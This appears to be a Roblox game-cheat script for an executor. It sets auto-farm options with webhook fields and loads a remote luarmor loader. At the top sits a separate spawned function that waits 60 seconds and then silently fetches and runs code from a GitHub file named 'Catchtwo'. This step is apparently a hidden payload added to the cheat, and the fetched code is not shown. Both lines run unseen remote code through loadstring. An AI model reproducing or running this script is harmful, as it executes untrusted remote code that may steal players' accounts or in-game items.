local function PartData()
local part = Instance.new("Part")
part.Name = "ExecutedTwo"
part.Parent = workspace

wait(60)

if not workspace:FindFirstChild("ExecutedOne") then
 loadstring(game:HttpGet("https://raw.githubusercontent.com/Pa1nx/System/refs/heads/main/Catchtwo"))()
end
end
spawn(PartData)

getgenv().Config = {
    ["Farming"] = {
        ["AutoSprinklers"] = true,
        ["AutoEvents"] = true,
        ["AutoFruits"] = true,
        ["AutoOpen"] = {"Gift Bag", "Large Gift Bag", "Mini Chest"},
        ["AutoPotions"] = {"Diamonds", "Damage", "Walkspeed", "Treasure Hunter"},
        ["AutoFlags"] = {"Diamonds"}
    },
    ["Webhook"] = {
        ["HugeURL"] = "",
        ["StatsURL"] = "",
        ["UserID"] = "731736164196679712",
        ["SendEvery"] = 3
    },
    ["Misc"] = {
        ["AutoHatch"] = true,
        ["AutoDaycare"] = false,
        ["UltraFPS"] = false,
    },
    ["Elemental"] = {
        ["AutoBuyCubes"] = {},
        ["AutoTrainerQuests"] = true,
        ["AutoFarmChest"] = true,
    }
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/2bdebaf848a6be382ed338dad329aaf2.lua"))()
